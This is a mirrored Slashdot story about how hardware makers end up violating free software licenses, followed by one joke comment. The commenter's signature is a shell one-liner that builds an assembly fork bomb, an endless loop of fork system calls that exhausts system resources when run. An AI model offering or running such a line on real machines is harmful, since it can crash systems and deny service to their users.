Slashdot Mirror


How Hardware Makers Come To Violate Free Software Licenses

H4x0r Jim Duggan writes "Veteran violation chasers Shane Coughlan and Armijn Hemel have summarized how license violations are caused in the consumer electronics market under time-to-market pressure and thin profit margins: 'This problem is compounded when one board with a problem appears in devices supplied to a number of western companies. A host of violation reports spanning a dozen European and American businesses may eventually point towards a single mistake during development at an Asian supplier.' They also discuss the helpful organizations which have sprung up and the documents and procedures now available."

1 of 186 comments (clear)

  1. Re:Free Software Licenses? by Hal_Porter · · Score: 5, Funny

    That reminds me of this classic, hivemind confusing post

    http://ask.slashdot.org/comments.pl?sid=6823&cid=886346

    --
    echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;